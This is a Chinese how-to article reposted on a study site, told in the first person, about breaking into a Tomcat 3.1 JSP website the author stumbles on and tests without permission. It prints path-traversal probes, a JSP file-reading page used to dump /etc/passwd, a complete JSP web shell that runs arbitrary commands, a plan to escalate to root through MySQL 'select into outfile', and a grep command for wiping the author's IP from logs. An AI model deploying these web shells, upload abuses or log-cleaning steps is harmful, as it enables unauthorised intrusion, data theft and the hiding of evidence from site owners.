您现在的位置: 学习网(Gzu521.com) >> 考试学习 >> 网络编程 >> Java教程 >> 文章正文

学习网考试学习资料

Gzu521.com

现场纪实—如何入侵基于JSP的网站

Java教程   点击:次   发布时间:2005-8-17   【字体: 】   来源:Gzu521.com
GZU521.COM学习网
  很偶然的一个机会,浏览到一个网站,页面清新让人感觉很舒服。网站是用jsp开发的,出于个人爱好,我决定测试一下其系统的安全性。 

telnet www.target.com 8080
get /chinansl http/1.1
[enter]
[enter] 


  返回的结果如下: 

http/1.0 404 not found
date: SUN, 08 jul 2001 07:49:13 gmt
Servlet-engine: Tomcat web server/3.1 (jsp 1.1; servlet 2.2; Java 1.2.2; LINUX 2
.2.12 i386; java.vendor=blackdown java-linux team)
content-language: en
content-type: text/html
status: 404

〈h1〉error: 404〈/h1〉
〈h2〉location: /chinansl〈/h2〉file not found〈br〉/chinansl 


  获得了运行的webserver的名称“tomcat 3.1”。记得曾经发现过这个版本的漏洞,并且post到bugtrap上去过。 

  回忆一下,大概是通过“..”技术可以退出web目录,于是: 

http://target:8080/../../../../%00.jsp ;(不行)
http://target:8080/file/index.jsp ;(不行)
http://target:8080/index.jsp ;(不行)
http://target:8080/index.jsp%81 ;(不行)
http://target:8080/index.js%70 ;(不行)
http://target:8080/index.jsp%2581 ;(不行)
http://target:8080/web-inf/ ;(不行) 


  看来安全状况似乎还不错,我们再来进行一下更深层的测试。tomcat 3.1自带了一个管理工具,可以查看web下的目录及文件,并且可以添加context。于是尝试: 

http://target:8080/admin/ ;


  管理员果然没有删除或禁止访问这个目录,从安全的角度说,这点应该算是一个比较重要的失误。 

  接着,点击“view all context”按钮,列出了web目录下的一些文件和目录的名称,很快发现了一个上传文件的组件,通过这个组件将一个jsp文件上传到对方的web目录里: 

〈%@ page import="java.io.*" %〉
〈%
string file = request.getparameter("file");
string str = "";
fileinputstream fis = null;
datainputstream dis = null;
try{
fis = new fileinputstream(file);
dis = new datainputstream(fis);
while(true){
try{
str = dis.readline();
}catch(exception e){}
if(str == null)break;
out.print(str+"〈br〉");
}
}catch(ioexception e){}
%〉 


  然后执行: 

http://target:8080/upload/test.jsp?file=/etc/passwd ;

 

  密码出来了。接下来的过程是猜测密码,没有成功。不过,现在相当于有了一个shell,猜不出密码可以先把ie当作shell环境。 
  再写一个jsp文件: 

〈%@ page import="java.io.*" %〉
〈%
try {
string cmd = request.getparameter("cmd");
process child = runtime.getruntime().exec(cmd);
inputstream in = child.getinputstream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitfor();
} catch (interruptedexception e) {
e.printstacktrace();
}
} catch (ioexception e) {
system.err.println(e);
}
%〉 


  然后把这个jsp再通过upload上传,有shell了。 

http://target:8080/upload/cmd.jsp?cmd=ls+-la+/
(详细结果这里就不列出来了) 


  怎么获得root权限呢?经过一番搜索发现系统安装了MySQL,并且从jsp的源代码中得到了mysql的密码,执行: 

sqld"〉http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld 


  显示: 

root 87494 0.2 1.9 17300 4800 p0- s 28jun01 5:54.72 /usr/local/data/mysql 


  系统是以root身份运行的mysql。这时我思考了一下,既然知道了mysql的密码,那就可以写一个shell程序,让它创建一个表,然后将我的数据放到表中,再使用“select ... into outfile;”的办法在系统上创建一个文件,让用户在执行su的时候,运行我的程序。(还记得Apache.org有一次被入侵吗?黑客就采用的这种办法)。 

  之后就比较简单了,上传bindshell之类的程序,运行、获得nobody的权限,使用su root时帮忙创建的setuid shell让自己成为root。 

  但是,接下来已经实际操作,结果令人颇感意外: 

http://target:8080/upload/cmd.jsp?cmd=id ;


  显示: 

uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx) 


  原来这个web shell本来就是root!管理员的安全设置工作到底怎么做的? 

http://target:8080/upload/cmd.jsp?cmd=ps+aux
果然是root身份运行的(不列出来了) 


  剩下的事情: 

  1、删除我的telnet记录。 

  2、删除http的日志。 

  清除日志我使用的办法是:cat xxx |grep -v "ip" 〉〉temp然后在把temp覆盖那些被我修改过的日志文件。 

  说明一点,我没有更换该网站的页面,因为我只是个网络安全爱好者。所以,发封邮件告诉system admin吧!当然,我顺便在信中提到,如果需要安盟信息科技为他提供安全服务的话,我们会非常的高兴!

责任编辑:gzu521

本类相关文章:
 如何安全关闭超时的Java线程
 创建Java线程的两种方法
 用JSP编写通用信息发布程序
 新一代Java技术即将出现
 快速排序方法Java实现与分析
 我的Struts分页方法
 概述 Java 数据库连接 3.0 
 使用javamail 的一些问题
 servlet规范定义的Servlet 生命周期
 JAVA数据类型转换
 JSP/Servlet的重定向技术综述
 Java图像处理技巧四则
更多相关信息->
网络编程分类
ASP教程
.Net教程
Java教程
PHP教程
数据库基础
ACCESS教程
SQL Server教程
MySQL教程
Oracle教程
分类推荐信息
更多...
大类最新文章
更多...